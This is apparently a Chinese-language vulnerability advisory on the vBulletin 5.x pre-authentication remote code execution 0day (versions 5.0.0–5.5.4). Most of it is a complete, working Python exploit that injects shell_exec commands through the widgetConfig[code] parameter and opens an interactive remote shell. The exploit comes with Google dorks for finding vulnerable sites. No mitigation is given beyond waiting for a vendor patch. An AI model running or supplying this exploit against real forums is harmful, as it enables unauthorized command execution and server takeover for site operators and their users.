0x01漏洞概述
vBulletin 是美国 Internet Brands 和 vBulletin Solutions 公司共同开发的一款开源的商业Web论坛程序。
一位匿名安全研究人员在受欢迎的论坛软件 vBulletin 中发现未修补的 0day 并披露了相关 PoC。根据对已发布代码的分析,该 0day 允许攻击者在运行 vBulletin 实例的服务器上执行 Shell 命令而无需具有目标论坛的账户。也就是说这是一个“预身份验证的远程代码执行”漏洞,是能够对 web 平台造成最严重影响的安全缺陷类型之一。
尽管 vBulletin 是一款商用产品,但它仍然是最热门的web论坛软件包,其市场份额要大于多种开源的解决方案如 phpBB、XenForo、Simple Machines Forum、MyBB等。由于 vBulletin 被超过10 万个在线网站所使用,因此该漏洞的潜在影响范围极大。
0x02影响版本
vBulletin 5.0.0~5.5.4
0x03漏洞验证
POC:
#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"
import requests
import sys
if len(sys.argv) != 2:
sys.exit("Usage: %s " % sys.argv[0])
params = {"routestring":"ajax/render/widget_php"}
while True:
try:
cmd = raw_input("vBulletin$ ")
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
r = requests.post(url = sys.argv[1], data = params)
if r.status_code == 200:
print r.text
else:
sys.exit("Exploit failed! :(")
except KeyboardInterrupt:
sys.exit("nClosing shell...")
except Exception, e:
sys.exit(str(e))
0x04修复建议
坐等官方更新。